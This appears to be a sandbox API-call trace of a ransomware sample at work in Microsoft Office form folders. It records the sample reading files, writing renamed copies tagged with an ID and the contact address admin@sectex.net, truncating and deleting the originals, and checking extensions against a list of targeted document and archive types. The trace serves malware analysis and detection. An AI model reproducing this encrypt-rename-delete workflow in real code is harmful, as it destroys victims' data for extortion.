	[0160.684] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DISTLIST.CFG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\distlist.cfg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0160.698] GetLastError () returned 0x0
	[0160.698] ReadFile (in: hFile=0x388, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x325, lpOverlapped=0x0) returned 1
	[0160.706] WriteFile (in: hFile=0x1b4, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0x330, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0x330, lpOverlapped=0x0) returned 1
	[0160.707] ReadFile (in: hFile=0x388, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0160.707] WriteFile (in: hFile=0x1b4, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0160.707] SetEndOfFile (hFile=0x1b4) returned 1
	[0160.707] CloseHandle (hObject=0x1b4) returned 1
	[0160.707] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.707] SetEndOfFile (hFile=0x388) returned 1
	[0160.709] CloseHandle (hObject=0x388) returned 1
	[0160.709] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DISTLIST.CFG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0160.792] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DISTLIST.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\distlist.cfg")) returned 1
	[0160.793] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DISTLIST.CFG") returned 66
	[0160.793] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DISTLIST.CFG") returned 66
	[0160.793] lstrlenW (lpString=".doc") returned 4
	[0160.793] lstrcmpiW (lpString1=".doc", lpString2=".CFG") returned 1
	[0160.793] lstrlenW (lpString=".docx") returned 5
	[0160.793] lstrcmpiW (lpString1=".docx", lpString2="T.CFG") returned -1
	[0160.793] lstrlenW (lpString=".pdf") returned 4
	[0160.793] lstrcmpiW (lpString1=".pdf", lpString2=".CFG") returned 1
	[0160.793] lstrlenW (lpString=".xls") returned 4
	[0160.793] lstrcmpiW (lpString1=".xls", lpString2=".CFG") returned 1
	[0160.793] lstrlenW (lpString=".xlsx") returned 5
	[0160.793] lstrcmpiW (lpString1=".xlsx", lpString2="T.CFG") returned -1
	[0160.793] lstrlenW (lpString=".ppt") returned 4
	[0160.794] lstrcmpiW (lpString1=".ppt", lpString2=".CFG") returned 1
	[0160.794] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DISTLIST.CFG") returned 66
	[0160.794] lstrlenW (lpString=".zip") returned 4
	[0160.794] lstrcmpiW (lpString1=".zip", lpString2=".CFG") returned 1
	[0160.794] lstrlenW (lpString=".rar") returned 4
	[0160.794] lstrcmpiW (lpString1=".rar", lpString2=".CFG") returned 1
	[0160.794] lstrlenW (lpString=".bz2") returned 4
	[0160.794] lstrcmpiW (lpString1=".bz2", lpString2=".CFG") returned -1
	[0160.794] lstrlenW (lpString=".7z") returned 3
	[0160.794] lstrcmpiW (lpString1=".7z", lpString2="CFG") returned -1
	[0160.794] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DISTLIST.CFG") returned 66
	[0160.794] lstrlenW (lpString=".dbf") returned 4
	[0160.794] lstrcmpiW (lpString1=".dbf", lpString2=".CFG") returned 1
	[0160.794] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DISTLIST.CFG") returned 66
	[0160.794] lstrlenW (lpString=".1cd") returned 4
	[0160.794] lstrcmpiW (lpString1=".1cd", lpString2=".CFG") returned -1
	[0160.794] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DISTLIST.CFG") returned 66
	[0160.794] lstrlenW (lpString=".jpg") returned 4
	[0160.794] lstrcmpiW (lpString1=".jpg", lpString2=".CFG") returned 1
	[0160.794] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DISTLIST.CFG") returned 66
	[0160.794] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DISTLIST.CFG") returned 66
	[0160.794] lstrlenW (lpString=".doc") returned 4
	[0160.794] lstrcmpiW (lpString1=".doc", lpString2=".CFG") returned 1
	[0160.794] lstrlenW (lpString=".docx") returned 5
	[0160.794] lstrcmpiW (lpString1=".docx", lpString2="T.CFG") returned -1
	[0160.794] lstrlenW (lpString=".pdf") returned 4
	[0160.794] lstrcmpiW (lpString1=".pdf", lpString2=".CFG") returned 1
	[0160.794] lstrlenW (lpString=".xls") returned 4
	[0160.794] lstrcmpiW (lpString1=".xls", lpString2=".CFG") returned 1
	[0160.794] lstrlenW (lpString=".xlsx") returned 5
	[0160.794] lstrcmpiW (lpString1=".xlsx", lpString2="T.CFG") returned -1
	[0160.795] lstrlenW (lpString=".ppt") returned 4
	[0160.795] lstrcmpiW (lpString1=".ppt", lpString2=".CFG") returned 1
	[0160.795] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DISTLIST.CFG") returned 66
	[0160.795] lstrlenW (lpString=".zip") returned 4
	[0160.795] lstrcmpiW (lpString1=".zip", lpString2=".CFG") returned 1
	[0160.795] lstrlenW (lpString=".rar") returned 4
	[0160.795] lstrcmpiW (lpString1=".rar", lpString2=".CFG") returned 1
	[0160.795] lstrlenW (lpString=".bz2") returned 4
	[0160.795] lstrcmpiW (lpString1=".bz2", lpString2=".CFG") returned -1
	[0160.795] lstrlenW (lpString=".7z") returned 3
	[0160.795] lstrcmpiW (lpString1=".7z", lpString2="CFG") returned -1
	[0160.795] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DISTLIST.CFG") returned 66
	[0160.795] lstrlenW (lpString=".dbf") returned 4
	[0160.795] lstrcmpiW (lpString1=".dbf", lpString2=".CFG") returned 1
	[0160.795] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DISTLIST.CFG") returned 66
	[0160.795] lstrlenW (lpString=".1cd") returned 4
	[0160.795] lstrcmpiW (lpString1=".1cd", lpString2=".CFG") returned -1
	[0160.795] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\DISTLIST.CFG") returned 66
	[0160.795] lstrlenW (lpString=".jpg") returned 4
	[0160.795] lstrcmpiW (lpString1=".jpg", lpString2=".CFG") returned 1
	[0160.795] lstrcmpiW (lpString1=".ICO", lpString2=".bot") returned 1
	[0160.795] lstrlenW (lpString="EXITEML.ICO") returned 11
	[0160.795] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\EXITEML.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\exiteml.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0160.796] GetFileSizeEx (in: hFile=0x3d0, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=1078) returned 1
	[0160.796] CloseHandle (hObject=0x3d0) returned 1
	[0160.796] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\EXITEML.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\exiteml.ico")) returned 0x20
	[0160.796] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\EXITEML.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\exiteml.ico.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0160.796] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\EXITEML.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\exiteml.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0160.797] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.797] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.797] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\EXITEML.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\exiteml.ico.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0160.797] GetLastError () returned 0x0
	[0160.797] ReadFile (in: hFile=0x3d0, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x436, lpOverlapped=0x0) returned 1
	[0160.801] WriteFile (in: hFile=0x3f0, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0x440, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0x440, lpOverlapped=0x0) returned 1
	[0160.802] ReadFile (in: hFile=0x3d0, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0160.802] WriteFile (in: hFile=0x3f0, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xea, lpOverlapped=0x0) returned 1
	[0160.802] SetEndOfFile (hFile=0x3f0) returned 1
	[0160.802] CloseHandle (hObject=0x3f0) returned 1
	[0160.803] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.803] SetEndOfFile (hFile=0x3d0) returned 1
	[0160.805] CloseHandle (hObject=0x3d0) returned 1
	[0160.805] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\EXITEML.ICO.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0160.805] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\EXITEML.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\exiteml.ico")) returned 1
	[0160.806] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\EXITEML.ICO") returned 65
	[0160.806] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\EXITEML.ICO") returned 65
	[0160.806] lstrlenW (lpString=".doc") returned 4
	[0160.806] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0160.806] lstrlenW (lpString=".docx") returned 5
	[0160.806] lstrcmpiW (lpString1=".docx", lpString2="L.ICO") returned -1
	[0160.806] lstrlenW (lpString=".pdf") returned 4
	[0160.806] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0160.806] lstrlenW (lpString=".xls") returned 4
	[0160.806] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0160.806] lstrlenW (lpString=".xlsx") returned 5
	[0160.806] lstrcmpiW (lpString1=".xlsx", lpString2="L.ICO") returned -1
	[0160.806] lstrlenW (lpString=".ppt") returned 4
	[0160.806] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0160.806] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\EXITEML.ICO") returned 65
	[0160.806] lstrlenW (lpString=".zip") returned 4
	[0160.806] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0160.806] lstrlenW (lpString=".rar") returned 4
	[0160.806] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0160.806] lstrlenW (lpString=".bz2") returned 4
	[0160.806] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0160.806] lstrlenW (lpString=".7z") returned 3
	[0160.806] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0160.806] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\EXITEML.ICO") returned 65
	[0160.806] lstrlenW (lpString=".dbf") returned 4
	[0160.806] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0160.806] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\EXITEML.ICO") returned 65
	[0160.806] lstrlenW (lpString=".1cd") returned 4
	[0160.806] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0160.806] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\EXITEML.ICO") returned 65
	[0160.806] lstrlenW (lpString=".jpg") returned 4
	[0160.807] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0160.807] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\EXITEML.ICO") returned 65
	[0160.807] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\EXITEML.ICO") returned 65
	[0160.807] lstrlenW (lpString=".doc") returned 4
	[0160.807] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0160.807] lstrlenW (lpString=".docx") returned 5
	[0160.807] lstrcmpiW (lpString1=".docx", lpString2="L.ICO") returned -1
	[0160.807] lstrlenW (lpString=".pdf") returned 4
	[0160.807] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0160.807] lstrlenW (lpString=".xls") returned 4
	[0160.807] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0160.807] lstrlenW (lpString=".xlsx") returned 5
	[0160.807] lstrcmpiW (lpString1=".xlsx", lpString2="L.ICO") returned -1
	[0160.807] lstrlenW (lpString=".ppt") returned 4
	[0160.807] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0160.807] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\EXITEML.ICO") returned 65
	[0160.807] lstrlenW (lpString=".zip") returned 4
	[0160.807] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0160.807] lstrlenW (lpString=".rar") returned 4
	[0160.807] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0160.807] lstrlenW (lpString=".bz2") returned 4
	[0160.807] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0160.807] lstrlenW (lpString=".7z") returned 3
	[0160.807] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0160.807] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\EXITEML.ICO") returned 65
	[0160.807] lstrlenW (lpString=".dbf") returned 4
	[0160.807] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0160.807] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\EXITEML.ICO") returned 65
	[0160.807] lstrlenW (lpString=".1cd") returned 4
	[0160.807] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0160.807] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\EXITEML.ICO") returned 65
	[0160.808] lstrlenW (lpString=".jpg") returned 4
	[0160.808] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0160.808] lstrcmpiW (lpString1=".ICO", lpString2=".bot") returned 1
	[0160.808] lstrlenW (lpString="EXITEMS.ICO") returned 11
	[0160.808] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\EXITEMS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\exitems.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0160.808] GetFileSizeEx (in: hFile=0x3d0, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=2998) returned 1
	[0160.808] CloseHandle (hObject=0x3d0) returned 1
	[0160.808] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\EXITEMS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\exitems.ico")) returned 0x20
	[0160.808] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\EXITEMS.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\exitems.ico.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0160.809] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\EXITEMS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\exitems.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0160.809] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.809] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.809] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\EXITEMS.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\exitems.ico.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0160.810] GetLastError () returned 0x0
	[0160.810] ReadFile (in: hFile=0x3d0, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0xbb6, lpOverlapped=0x0) returned 1
	[0160.811] WriteFile (in: hFile=0x3f0, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xbc0, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xbc0, lpOverlapped=0x0) returned 1
	[0160.812] ReadFile (in: hFile=0x3d0, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0160.813] WriteFile (in: hFile=0x3f0, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xea, lpOverlapped=0x0) returned 1
	[0160.813] SetEndOfFile (hFile=0x3f0) returned 1
	[0160.813] CloseHandle (hObject=0x3f0) returned 1
	[0160.813] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.813] SetEndOfFile (hFile=0x3d0) returned 1
	[0160.815] CloseHandle (hObject=0x3d0) returned 1
	[0160.815] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\EXITEMS.ICO.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0160.816] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\EXITEMS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\exitems.ico")) returned 1
	[0160.817] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\EXITEMS.ICO") returned 65
	[0160.817] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\EXITEMS.ICO") returned 65
	[0160.817] lstrlenW (lpString=".doc") returned 4
	[0160.817] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0160.817] lstrlenW (lpString=".docx") returned 5
	[0160.817] lstrcmpiW (lpString1=".docx", lpString2="S.ICO") returned -1
	[0160.817] lstrlenW (lpString=".pdf") returned 4
	[0160.817] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0160.817] lstrlenW (lpString=".xls") returned 4
	[0160.817] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0160.817] lstrlenW (lpString=".xlsx") returned 5
	[0160.817] lstrcmpiW (lpString1=".xlsx", lpString2="S.ICO") returned -1
	[0160.817] lstrlenW (lpString=".ppt") returned 4
	[0160.817] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0160.817] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\EXITEMS.ICO") returned 65
	[0160.817] lstrlenW (lpString=".zip") returned 4
	[0160.817] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0160.817] lstrlenW (lpString=".rar") returned 4
	[0160.817] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0160.817] lstrlenW (lpString=".bz2") returned 4
	[0160.817] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0160.817] lstrlenW (lpString=".7z") returned 3
	[0160.817] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0160.817] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\EXITEMS.ICO") returned 65
	[0160.818] lstrlenW (lpString=".dbf") returned 4
	[0160.818] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0160.818] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\EXITEMS.ICO") returned 65
	[0160.818] lstrlenW (lpString=".1cd") returned 4
	[0160.818] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0160.818] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\EXITEMS.ICO") returned 65
	[0160.818] lstrlenW (lpString=".jpg") returned 4
	[0160.818] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0160.818] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\EXITEMS.ICO") returned 65
	[0160.818] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\EXITEMS.ICO") returned 65
	[0160.818] lstrlenW (lpString=".doc") returned 4
	[0160.818] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0160.818] lstrlenW (lpString=".docx") returned 5
	[0160.818] lstrcmpiW (lpString1=".docx", lpString2="S.ICO") returned -1
	[0160.818] lstrlenW (lpString=".pdf") returned 4
	[0160.818] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0160.818] lstrlenW (lpString=".xls") returned 4
	[0160.818] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0160.818] lstrlenW (lpString=".xlsx") returned 5
	[0160.818] lstrcmpiW (lpString1=".xlsx", lpString2="S.ICO") returned -1
	[0160.818] lstrlenW (lpString=".ppt") returned 4
	[0160.818] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0160.818] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\EXITEMS.ICO") returned 65
	[0160.818] lstrlenW (lpString=".zip") returned 4
	[0160.818] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0160.818] lstrlenW (lpString=".rar") returned 4
	[0160.818] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0160.818] lstrlenW (lpString=".bz2") returned 4
	[0160.818] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0160.818] lstrlenW (lpString=".7z") returned 3
	[0160.818] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0160.819] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\EXITEMS.ICO") returned 65
	[0160.819] lstrlenW (lpString=".dbf") returned 4
	[0160.819] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0160.819] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\EXITEMS.ICO") returned 65
	[0160.819] lstrlenW (lpString=".1cd") returned 4
	[0160.819] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0160.819] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\EXITEMS.ICO") returned 65
	[0160.819] lstrlenW (lpString=".jpg") returned 4
	[0160.819] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0160.819] lstrcmpiW (lpString1=".CFG", lpString2=".bot") returned 1
	[0160.819] lstrlenW (lpString="INFOMAIL.CFG") returned 12
	[0160.819] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\INFOMAIL.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\infomail.cfg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0160.820] GetFileSizeEx (in: hFile=0x3d0, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=616) returned 1
	[0160.820] CloseHandle (hObject=0x3d0) returned 1
	[0160.820] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\INFOMAIL.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\infomail.cfg")) returned 0x20
	[0160.820] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\INFOMAIL.CFG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\infomail.cfg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0160.821] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\INFOMAIL.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\infomail.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0160.821] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0160.821] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
